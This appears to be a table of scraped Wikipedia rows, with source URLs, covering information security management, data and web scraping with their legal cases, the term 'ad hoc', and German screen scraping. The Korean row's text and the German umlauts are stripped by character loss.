be facilitated with the use of automated work flow application. 284 The responsibility of the change review board is to ensure the organization's documented change management procedures are followed. 285 The change management process is as follows 286 Change management procedures that are simple to follow and easy to use can greatly reduce the overall risks created when changes are made to the information processing environment. 318 Good change management procedures improve the overall quality and success of changes as they are implemented. 319 This is accomplished through planning, peer review, documentation, and communication. 320 ISO IEC 20000, The Visible OPS Handbook: Implementing ITIL in 4 Practical and Auditable Steps 321 (Full book summary), 322 and ITIL all provide valuable guidance on implementing an efficient and effective change management program information security. 323 Business continuity management (BCM) concerns arrangements aiming to protect an organization's critical business functions from interruption due to incidents, or at least minimize the effects. 324 325 BCM is essential to any organization to keep technology and business in line with current threats to the continuation of business as usual. 326 The BCM should be included in an organizations risk analysis plan to ensure that all of the necessary business functions have what they need to keep going in the event of any type of threat to any business function. 327 It encompasses: Whereas BCM takes a broad approach to minimizing disaster-related risks by reducing both the probability and the severity of incidents, a disaster recovery plan (DRP) focuses specifically on resuming business operations as quickly as possible after a disaster. 337 A disaster recovery plan, invoked soon after a disaster occurs, lays out the steps necessary to recover critical information and communications technology (ICT) infrastructure. 338 Disaster recovery planning includes establishing a planning group, performing risk assessment, establishing priorities, developing recovery strategies, preparing inventories and documentation of the plan, developing verification criteria and procedure, and lastly implementing the plan. 339 Below is a partial listing of governmental laws and regulations in various parts of the world that have, had, or will have, a significant effect on data processing and information security. 340 341 Important industry sector regulations have also been included when they have a significant impact on information security. 340 The US Department of Defense (DoD) issued DoD Directive 8570 in 2004, supplemented by DoD Directive 8140, requiring all DoD employees and all DoD contract personnel involved in information assurance roles and activities to earn and maintain various industry Information Technology (IT) certifications in an effort to ensure that all DoD personnel involved in network infrastructure defense have minimum levels of IT industry recognized knowledge, skills and abilities (KSA). Andersson and Reimers (2019) report these certifications range from CompTIA's A and Security through the ICS2.org's CISSP, etc. 376 Describing more than simply how security aware employees are, information security culture is the ideas, customs, and social behaviors of an organization that impact information security in both positive and negative ways. 377 Cultural concepts can help different segments of the organization work effectively or work against effectiveness towards information security within an organization. The way employees think and feel about security and the actions they take can have a big impact on information security in organizations. Roer Petric (2017) identify seven core dimensions of information security culture in organizations: 378 Andersson and Reimers (2014) found that employees often do not see themselves as part of the organization Information Security "effort" and often take actions that ignore organizational information security best interests. 380 Research shows information security culture needs to be improved continuously. In Information Security Culture from Analysis to Change, authors commented, "It's a never ending process, a cycle of evaluation and change or maintenance. To manage the information security culture, five steps should be taken: pre-evaluation, strategic planning, operative planning, implementation, and post-evaluation. 381 The International Organization for Standardization (ISO) is an international standards organization organized as a consortium of national standards institutions from 167 countries, coordinated through a secretariat in Geneva, Switzerland. ISO is the world's largest developer of international standards. The International Electrotechnical Commission (IEC) is an international standards organization that deals with electrotechnology and cooperates closely with ISO. ISO IEC 15443: "Information technology Security techniques A framework for IT security assurance", ISO IEC 27002: "Information technology Security techniques Code of practice for information security management", ISO IEC 20000: "Information technology Service management", and ISO IEC 27001: "Information technology Security techniques Information security management systems Requirements" are of particular interest to information security professionals. The US National Institute of Standards and Technology (NIST) is a non-regulatory federal agency within the U.S. Department of Commerce. The NIST Computer Security Division develops standards, metrics, tests, and validation programs as well as publishes standards and guidelines to increase secure IT planning, implementation, management, and operation. NIST is also the custodian of the U.S. Federal Information Processing Standard publications (FIPS). The Internet Society is a professional membership society with more than 100 organizations and over 20,000 individual members in over 180 countries. It provides leadership in addressing issues that confront the future of the internet, and it is the organizational home for the groups responsible for internet infrastructure standards, including the Internet Engineering Task Force (IETF) and the Internet Architecture Board (IAB). The ISOC hosts the Requests for Comments (RFCs) which includes the Official Internet Protocol Standards and the RFC 2196 Site Security Handbook. The Information Security Forum (ISF) is a global nonprofit organization of several hundred leading organizations in financial services, manufacturing, telecommunications, consumer goods, government, and other areas. It undertakes research into information security practices and offers advice in its biannual Standard of Good Practice for Information Security and more detailed advisories for members. The Institute of Information Security Professionals (IISP) is an independent, non-profit body governed by its members, with the principal objective of advancing the professionalism of information security practitioners and thereby the professionalism of the industry as a whole. The institute developed the IISP Skills Framework. This framework describes the range of competencies expected of information security and information assurance professionals in the effective performance of their roles. It was developed through collaboration between both private and public sector organizations, world-renowned academics, and security leaders. 382 The German Federal Office for Information Security (in German Bundesamt f r Sicherheit in der Informationstechnik (BSI)) BSI-Standards 100 1 to 100 4 are a set of recommendations including "methods, processes, procedures, approaches and measures relating to information security". 383 The BSI-Standard 100 2 IT-Grundschutz Methodology describes how information security management can be implemented and operated. The standard includes a very specific guide, the IT Baseline Protection Catalogs (also known as IT-Grundschutz Catalogs). Before 2005, the catalogs were formerly known as "IT Baseline Protection Manual". The Catalogs are a collection of documents useful for detecting and combating security-relevant weak points in the IT environment (IT cluster). The collection encompasses as of September 2013 over 4,400 pages with the introduction and catalogs. The IT-Grundschutz approach is aligned with to the ISO IEC 2700x family. The European Telecommunications Standards Institute standardized a catalog of information security indicators, headed by the Industrial Specification Group (ISG) ISI. |
324 | https://en.wikipedia.org/wiki/Web_scraping | https://ko.wikipedia.org/wiki/%EC%9B%B9_%EC%8A%A4%ED%81%AC%EB%9E%98%ED%95%91 | (web scraping), (web harvesting) (web data extraction) . HTTP . . . . ( ). . . , , , . . , URL, ( ). , , , ( ), , , , , , , , . (HTML XHTML) . . , . . JSON . ( ) . DOM , . |
325 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/w/index.php?title=Data_scraping&printable=yes | Data scraping is a technique where a computer program extracts data from human-readable output coming from another program. Normally, data transfer between programs is accomplished using data structures suited for automated processing by computers, not people. Such interchange formats and protocols are typically rigidly structured, well-documented, easily parsed, and minimize ambiguity. Very often, these transmissions are not human-readable at all. Thus, the key element that distinguishes data scraping from regular parsing is that the output being scraped is intended for display to an end-user, rather than as an input to another program. It is therefore usually neither documented nor structured for convenient parsing. Data scraping often involves ignoring binary data (usually images or multimedia data), display formatting, redundant labels, superfluous commentary, and other information which is either irrelevant or hinders automated processing. Data scraping is most often done either to interface to a legacy system, which has no other mechanism which is compatible with current hardware, or to interface to a third-party system which does not provide a more convenient API. In the second case, the operator of the third-party system will often see screen scraping as unwanted, due to reasons such as increased system load, the loss of advertisement revenue, or the loss of control of the information content. Data scraping is generally considered an ad hoc, inelegant technique, often used only as a "last resort" when no other mechanism for data interchange is available. Aside from the higher programming and processing overhead, output displays intended for human consumption often change structure frequently. Humans can cope with this easily, but a computer program will fail. Depending on the quality and the extent of error handling logic present in the computer, this failure can result in error messages, corrupted output or even program crashes. However, setting up a data scraping pipeline nowadays is straightforward, requiring minimal programming effort to meet practical needs (especially in biomedical data integration). 1 Although the use of physical "dumb terminal" IBM 3270s is slowly diminishing, as more and more mainframe applications acquire Web interfaces, some Web applications merely continue to use the technique of screen scraping to capture old screens and transfer the data to modern front-ends. 2 Screen scraping is normally associated with the programmatic collection of visual data from a source, instead of parsing data as in web scraping. Originally, screen scraping referred to the practice of reading text data from a computer display terminal's screen. This was generally done by reading the terminal's memory through its auxiliary port, or by connecting the terminal output port of one computer system to an input port on another. The term screen scraping is also commonly used to refer to the bidirectional exchange of data. This could be the simple cases where the controlling program navigates through the user interface, or more complex scenarios where the controlling program is entering data into an interface meant to be used by a human. As a concrete example of a classic screen scraper, consider a hypothetical legacy system dating from the 1960s—the dawn of computerized data processing. Computer to user interfaces from that era were often simply text-based dumb terminals which were not much more than virtual teleprinters (such systems are still in use today update , for various reasons). The desire to interface such a system to more modern systems is common. A robust solution will often require things no longer available, such as source code, system documentation, APIs, or programmers with experience in a 50 year-old computer system. In such cases, the only feasible solution may be to write a screen scraper that "pretends" to be a user at a terminal. The screen scraper might connect to the legacy system via Telnet, emulate the keystrokes needed to navigate the old user interface, process the resulting display output, extract the desired data, and pass it on to the modern system. A sophisticated and resilient implementation of this kind, built on a platform providing the governance and control required by a major enterprise—e.g. change control, security, user management, data protection, operational audit, load balancing, and queue management, etc.—could be said to be an example of robotic process automation software, called RPA or RPAAI for self-guided RPA 2.0 based on artificial intelligence. In the 1980s, financial data providers such as Reuters, Telerate, and Quotron displayed data in 24 80 format intended for a human reader. Users of this data, particularly investment banks, wrote applications to capture and convert this character data as numeric data for inclusion into calculations for trading decisions without re-keying the data. The common term for this practice, especially in the United Kingdom, was page shredding, since the results could be imagined to have passed through a paper shredder. Internally Reuters used the term 'logicized' for this conversion process, running a sophisticated computer system on VAX VMS called the Logicizer. 3 More modern screen scraping techniques include capturing the bitmap data from the screen and running it through an OCR engine, or for some specialised automated testing systems, matching the screen's bitmap data against expected results. 4 This can be combined in the case of GUI applications, with querying the graphical controls by programmatically obtaining references to their underlying programming objects. A sequence of screens is automatically captured and converted into a database. Another modern adaptation to these techniques is to use, instead of a sequence of screens as input, a set of images or PDF files, so there are some overlaps with generic "document scraping" and report mining techniques. There are many tools that can be used for screen scraping. 5 Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. Because of this, tool kits that scrape web content were created. A web scraper is an API or tool to extract data from a website. 6 Companies like Amazon AWS and Google provide web scraping tools, services, and public data available free of cost to end-users. Newer forms of web scraping involve listening to data feeds from web servers. For example, JSON is commonly used as a transport storage mechanism between the client and the webserver. A web scraper uses a website's URL to extract data, and stores this data for subsequent analysis. This method of web scraping enables the extraction of data in an efficient and accurate manner. 7 Recently, companies have developed web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate the human processing that occurs when viewing a webpage to automatically extract useful information. 8 9 Large websites usually use defensive algorithms to protect their data from web scrapers and to limit the number of requests an IP or IP network may send. This has caused an ongoing battle between website developers and scraping developers. 10 Report mining is the extraction of data from human-readable computer reports. Conventional data extraction requires a connection to a working source system, suitable connectivity standards or an API, and usually complex querying. By using the source system's standard reporting options, and directing the output to a spool file instead of to a printer, static reports can be generated suitable for offline analysis via report mining. 11 This approach can avoid intensive CPU usage during business hours, can minimise end-user licence costs for ERP customers, and can offer very rapid prototyping and development of custom reports. Whereas data scraping and web scraping involve interacting with dynamic output, report mining involves extracting data from files in a human-readable format, such as HTML, PDF, or text. These can be easily generated from almost any system by intercepting the data feed to a printer. This approach can provide a quick and simple route to obtaining data without the need to program an API to the source system. |
326 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#cite_note-7 | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is Illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo , and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in the Cvent, Inc. v. Eventbrite, Inc. In the United States district court for the eastern district of Virginia, the court ruled that the terms of use should be brought to the users' attention In order for a browse wrap contract or license to be enforced. 16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's 'scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 300 search requests to QVC's website per minute, sometimes to up to 36,000 requests per minute) which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. In the plaintiff's web site during the period of this trial, the terms of use link are displayed among all the links of the site, at the bottom of the page as most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor on common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider the case in light of the 2021 Supreme Court decision in Van Buren v. United States which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld their prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. citation needed In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating the terms of use prohibiting data scraping will be a violation of the contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
327 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Ad_hoc | Ad hoc is a Latin phrase meaning literally 'for this'. In English, it typically signifies a solution designed for a specific purpose, problem, or task rather than a generalized solution adaptable to collateral instances (compare with a priori). Common examples include ad hoc committees and commissions created at the national or international level for a specific task, and the term is often used to describe arbitration (ad hoc arbitration). In other fields, the term could refer to a military unit created under special circumstances (see task force), a handcrafted network protocol (e.g., ad hoc network), a temporary collaboration among geographically-linked franchise locations (of a given national brand) to issue advertising coupons, or a purpose-specific equation in mathematics or science. Ad hoc can also function as an adjective describing temporary, provisional, or improvised methods to deal with a particular problem, the tendency of which has given rise to the noun adhocism. 1 This concept highlights the flexibility and adaptability often required in problem-solving across various domains. In everyday language, "ad hoc" is sometimes used informally to describe improvised or makeshift solutions, emphasizing their temporary nature and specific applicability to immediate circumstances. Style guides disagree on whether Latin phrases like ad hoc should be italicized. The trend is not to use italics. 2 For example, The Chicago Manual of Style recommends that familiar Latin phrases that are listed in the Webster's Dictionary, including "ad hoc", not be italicized. 3 4 In science and philosophy, ad hoc means the addition of extraneous hypotheses to a theory to save it from being falsified. Ad hoc hypotheses compensate for anomalies not anticipated by the theory in its unmodified form. Scientists are often skeptical of scientific theories that rely on frequent, unsupported adjustments to sustain them. Ad hoc hypotheses are often characteristic of pseudo-scientific subjects such as homeopathy. 5 In the military, ad hoc units are created during unpredictable situations, when the cooperation between different units is suddenly needed for fast action, or from remnants of previous units which have been overrun or otherwise whittled down. In national and sub-national governance, ad hoc bodies may be established to deal with specific problems not easily accommodated by the current structure of governance or to address multi-faceted issues spanning several areas of governance. In the UK and other commonwealth countries, ad hoc Royal Commissions 6 may be set up to address specific questions as directed by parliament. The term ad hoc networking typically refers to a system of network elements that combine to form a network requiring little or no planning. |
328 | https://en.wikipedia.org/wiki/Web_scraping | https://de.wikipedia.org/wiki/Screen_Scraping | Der Begriff Screen Scraping (engl., etwa: am Bildschirm sch rfen“) umfasst generell alle Verfahren zum Auslesen von Texten aus Computerbildschirmen. Gegenw rtig wird der Ausdruck jedoch beinahe ausschlie lich in Bezug auf Webseiten verwendet (daher auch Web Scraping oder Web Harvesting). In diesem Fall bezeichnet Screen Scraping speziell die Techniken, die der Gewinnung von Informationen durch gezieltes Extrahieren der ben tigten Daten dienen. Suchmaschinen verwenden sogenannte Crawler zum Durchsuchen des World Wide Web, zur Analyse von Webseiten und Sammeln von Daten, wie Web-Feeds oder E-Mail-Adressen. Screen-Scraping-Verfahren werden auch beim Web Mining angewandt. Um den Abruf und die Weiterverarbeitung von Informationen aus Webseiten f r den Kunden deutlich zu erleichtern, hat der Anbieter des Seiteninhalts (auch Content-Anbieter) die M glichkeit, die Daten nicht nur in Form einer (menschenlesbaren) Webseite darzustellen, sondern sie zus tzlich in einem maschinenlesbaren Format (etwa XML) aufzubereiten. Gezielt abgefragte Daten k nnten dem Kunden dadurch als Webservice zur automatisierten Weiterverarbeitung zur Verf gung gestellt werden. H ufig hat der Content-Anbieter jedoch kein Interesse an dem mechanisierten Abruf seiner Daten bzw. der automatisierten Nutzung seines Dienstes (insbesondere bez glich spezieller Funktionen, die ausschlie lich realen Nutzern vorbehalten sein sollten), oder die Errichtung eines Web Service w re mit zu hohen Kosten verbunden und daher unwirtschaftlich. In solchen F llen kommt h ufig das Screen Scraping zum Einsatz, um die gew nschten Daten dennoch aus der Webseite zu filtern. Screen Scraping kann zum Einsatz kommen, um den Browser mit weiteren Funktionen auszustatten oder bisher umst ndliche Vorg nge zu vereinfachen. So k nnen Anmeldevorg nge bei Foren automatisiert oder Dienste einer Webseite abgerufen werden, ohne dass der Nutzer die Webseite besuchen muss, sondern etwa ber eine Browser-Symbolleiste. Eine einfache Form von derartigen Screen Scrapern stellen Bookmarklets dar. Remixing ist eine Technik, bei der Webinhalte verschiedener Dienste zu einem neuen Dienst verbunden werden (siehe auch Mashup). Wenn keine offenen Programmierschnittstellen zur Verf gung stehen, muss hier ebenfalls auf Screen-Scraping-Mechanismen zur ckgegriffen werden. Screen-Scraping-Techniken k nnen jedoch auch missbraucht werden, indem Inhalte fremder Webseiten gegen den Willen des Anbieters kopiert und auf einem eigenen Server angeboten werden. Gerade durch das Training k nstlicher Intelligenz (KI) wie Chatbots und Bildgeneratoren kommt es zu einem zunehmenden Wettkampf von Webscraping durch kommerzielle KI-Unternehmen und Abwehrma nahmen von Online-Portalen und -Medien. 1 Screen Scraping besteht im Wesentlichen aus zwei Schritten: Idealerweise befinden sich die interessanten Daten auf einer Webseite, die ber eine URL abgerufen werden kann. Alle f r den Abruf der Informationen ben tigten Parameter werden ber URL-Parameter (Query-String, siehe GET-Request) bergeben. In diesem einfachen Fall wird einfach die Webseite heruntergeladen und die Daten werden mit einem geeigneten Mechanismus extrahiert. In vielen F llen werden die Parameter durch Ausf llen eines Webformulars abgefragt. Dabei werden die Parameter oft nicht in der URL bergeben, sondern im Nachrichtenk rper (POST-Request). Viele Webseiten enthalten personalisierte Informationen. Das Hypertext Transfer Protocol (HTTP) bietet jedoch keine native M glichkeit, Anfragen einer bestimmten Person zuzuordnen. Um eine bestimmte Person wiederzuerkennen, muss die Serveranwendung auf HTTP aufgesetzte Sitzungskonzepte verwenden. Eine h ufig genutzte M glichkeit ist die bertragung von Session-IDs durch die URL oder durch Cookies. Diese Sitzungskonzepte m ssen von einer Screen-Scraping-Anwendung unterst tzt werden. Ein Programm zur Extraktion von Daten aus Webseiten wird auch Wrapper genannt. Nachdem die Webseite heruntergeladen wurde, ist es f r die Extraktion der Daten zun chst wichtig, ob der genaue Ort der Daten auf der Webseite bekannt ist (etwa zweite Tabelle, dritte Spalte). Wenn dies der Fall ist, stehen f r die Extraktion der Daten verschiedene M glichkeiten zur Verf gung. Man kann zum einen die heruntergeladenen Webseiten als Zeichenketten interpretieren und etwa mit regul ren Ausdr cken die gew nschten Daten extrahieren. Wenn die Webseite XHTML-konform ist, bietet sich die Nutzung eines XML-Parsers an. F r den Zugriff auf XML gibt es zahlreiche unterst tzende Techniken (SAX, DOM, XPath, XQuery). Oft werden die Webseiten jedoch lediglich im (m glicherweise sogar fehlerhaften) HTML-Format ausgeliefert, welches nicht dem XML-Standard entspricht. Mit einem geeigneten Parser l sst sich unter Umst nden dennoch ein XML-konformes Dokument herstellen. Alternativ kann das HTML vor dem Parsen mit HTML Tidy bereinigt werden. Manche Screen Scraper verwenden eine eigens f r HTML entwickelte Anfragesprache. Ein Kriterium f r die G te der Extraktionsmechanismen ist die Robustheit gegen ber nderungen an der Struktur der Webseite. Hierf r sind fehlertolerante Extraktionsalgorithmen erforderlich. In vielen F llen ist die Struktur der Webseite jedoch unbekannt (etwa beim Einsatz von Crawlern). Datenstrukturen wie etwa Kaufpreisangaben oder Zeitangaben m ssen dann auch ohne feste Vorgaben erkannt und interpretiert werden. Ein Screen Scraper kann auf einem speziellen Webserver installiert sein, der in regelm igen Abst nden oder auf Anfrage die geforderten Daten abruft und seinerseits in aufbereiteter Form anbietet. Dieses serverseitige Vorgehen kann jedoch unter Umst nden rechtliche Probleme mit sich ziehen und vom Content-Anbieter auch leicht durch Blockieren der Server-IP verhindert werden. Beim verteilten Vorgehen werden die Informationen direkt vom Client abgerufen. Je nach Anwendung werden die Informationen in einer Datenbank gespeichert, an andere Anwendungen weitergegeben oder aufbereitet im Browser angezeigt. Die verteilte Architektur kann nicht nur schwieriger blockiert werden, sondern skaliert auch besser. Viele Content-Anbieter haben kein Interesse an einem isolierten Abrufen bestimmter Informationen. Grund daf r kann sein, dass sich der Anbieter durch Werbeeinblendungen finanziert, die durch Screen Scraping leicht gefiltert werden k nnen. Zudem k nnte der Content-Anbieter ein Interesse daran haben, den Benutzer zu einer bestimmten Navigationsreihenfolge zu zwingen. Um diese Interessen zu gew hrleisten, gibt es verschiedene Strategien. Der Server zwingt den Benutzer durch Verwenden von Session-IDs zu einer bestimmten Navigationsreihenfolge. Beim Aufruf der Verkehrslenkungsseite des Webangebotes wird eine tempor r g ltige Session-ID erzeugt. Diese wird ber die URL, versteckte Formularfelder oder durch Cookies bertragen. Wenn ein Nutzer oder ein Bot durch einen Deep Link auf die Seite st t, kann er keine g ltige Session-ID vorweisen. Der Server leitet ihn dann auf die Verkehrslenkungsseite um. Diese Strategie verwendet beispielsweise eBay, um Deep Links auf Auktionslisten zu verhindern. Ein speziell programmierter Screen Scraper kann sich 